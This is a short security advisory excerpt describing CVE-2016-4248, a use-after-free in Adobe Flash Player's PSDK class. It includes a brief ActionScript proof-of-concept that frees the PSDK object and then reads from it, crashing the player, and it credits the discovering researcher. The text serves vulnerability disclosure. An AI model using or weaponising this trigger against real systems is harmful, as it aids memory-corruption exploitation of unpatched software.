II. Description
PSDK Class expose a member function “release()”, which can be called directly to release the inner memory of PSDK.pSDK.
However, Not all of PSDK’s AS3 references are cleaned, it is still possible to invoke virtual functions on a release memory block.
Source Code of crash.swf:
package
{
import com.adobe.tvsdk.mediacore.PSDK;
import flash.display.Sprite;
public class poc extends Sprite
{
public function poc()
{
var ps:PSDK = PSDK.pSDK;
var ps_:PSDK = PSDK.pSDK;
ps.release();
ps_.currentTime;
}
}
V. Credit
Wen Guanxing from Pangu LAB is credited for this vulnerability.
It has been assigned as CVE-2016-4248 by Adobe:
https://helpx.adobe.com/security/products/flash-player/apsb16-25.html